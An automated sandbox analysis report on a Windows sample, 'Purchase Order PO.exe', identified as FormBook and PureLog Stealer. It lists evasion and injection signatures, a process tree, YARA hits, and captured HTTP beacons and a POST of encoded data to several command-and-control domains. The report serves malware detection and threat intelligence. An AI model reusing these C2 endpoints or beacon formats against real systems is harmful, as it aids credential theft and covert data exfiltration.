Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order PO.exe

Overview

General Information

Sample name:Purchase Order PO.exe
Analysis ID:1563856
MD5:0cc96cc7ca98f253a1daeabf90a7692d
SHA1:909b1214d652f749d9bac08659ca51ae84bdb5e6
SHA256:868a520694e9477aeb67c350fb599752c94d5b541dcf14a334422b7b020e5d92
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Purchase Order PO.exe (PID: 4564 cmdline: "C:\Users\user\Desktop\Purchase Order PO.exe" MD5: 0CC96CC7CA98F253A1DAEABF90A7692D)
    • Purchase Order PO.exe (PID: 2148 cmdline: "C:\Users\user\Desktop\Purchase Order PO.exe" MD5: 0CC96CC7CA98F253A1DAEABF90A7692D)
      • GDDZlGeaCapsK.exe (PID: 2140 cmdline: "C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 2992 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • GDDZlGeaCapsK.exe (PID: 1732 cmdline: "C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7164 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3284014687.0000000003480000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3284352554.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.2072668153.0000000005A60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Purchase Order PO.exe.40538a0.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              3.2.Purchase Order PO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.Purchase Order PO.exe.5a60000.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Purchase Order PO.exe.4033880.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Purchase Order PO.exe.5a60000.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: Purchase Order PO.exeReversingLabs: Detection: 42%
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3284014687.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3284352554.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2438402201.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3286346914.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3284154909.0000000003170000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2439723626.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: Purchase Order PO.exeJoe Sandbox ML: detected
                      Source: Purchase Order PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Purchase Order PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: isoburn.pdb source: Purchase Order PO.exe, 00000003.00000002.2437625544.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283390724.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: isoburn.pdbGCTL source: Purchase Order PO.exe, 00000003.00000002.2437625544.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, GDDZlGeaCapsK.exe, 00000005.00000002.3283390724.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GDDZlGeaCapsK.exe, 00000005.00000000.2361138234.000000000024E000.00000002.00000001.01000000.0000000C.sdmp, GDDZlGeaCapsK.exe, 00000008.00000002.3282670067.000000000024E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: CGFg.pdbSHA256P.K source: Purchase Order PO.exe
                      Source: Binary string: wntdll.pdbUGP source: Purchase Order PO.exe, 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2439946328.0000000004CBE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2437393096.0000000004B00000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Purchase Order PO.exe, Purchase Order PO.exe, 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2439946328.0000000004CBE000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2437393096.0000000004B00000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: CGFg.pdb source: Purchase Order PO.exe
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EDC4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_02EDC4E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax6_2_02EC9E40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h6_2_051C04F8

                      Networking

                      barindex
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.cyperla.xyz
                      Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                      Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                      Source: Joe Sandbox ViewASN Name: BETAINTERNATIONALTR BETAINTERNATIONALTR
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 27 Nov 2024 14:33:25 GMTserver: Apacheset-cookie: __tad=1732718005.4066806; expires=Sat, 25-Nov-2034 14:33:25 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 27 Nov 2024 14:33:27 GMTserver: Apacheset-cookie: __tad=1732718007.5915704; expires=Sat, 25-Nov-2034 14:33:27 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 27 Nov 2024 14:33:30 GMTserver: Apacheset-cookie: __tad=1732718010.4137190; expires=Sat, 25-Nov-2034 14:33:30 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                      Source: global trafficHTTP traffic detected: GET /qygv/?VF=6pChKdZP-&aX8p=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgsaqMlEMjEoKLMxsODg9Mufes6Fo8jzqPd1fmEliYc3z1g== HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qx5d/?aX8p=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPprLjHaJYh8SQgKp2LTuI6fSpOh4h3JLSnOc8Ym74JECmGQ==&VF=6pChKdZP- HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6ou6/?VF=6pChKdZP-&aX8p=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/UnDqMtKwbhA7qdtFmnjL5G+EcoCGS9edu4uK8ABvFKG4A== HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /v89f/?aX8p=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwJAbzgbWQC+UfE7zMLLi7rmhPg9Rv0rLNpU4Xsyq1J6Z3g==&VF=6pChKdZP- HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /8m07/?aX8p=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWbrjk6J8ayNTDMCMOGYuxRKnH7u2JQatSR3r/5wv+jpa8Q==&VF=6pChKdZP- HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                      Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                      Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                      Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 205Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36Data Raw: 61 58 38 70 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 51 51 62 57 79 70 64 74 6b 43 4a 4f 52 33 57 79 65 66 4b 4c 44 32 4b 45 41 63 76 67 5a 5a 49 65 75 68 70 2f 38 49 3d Data Ascii: aX8p=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYQQbWypdtkCJOR3WyefKLD2KEAcvgZZIeuhp/8I=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 27 Nov 2024 14:32:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 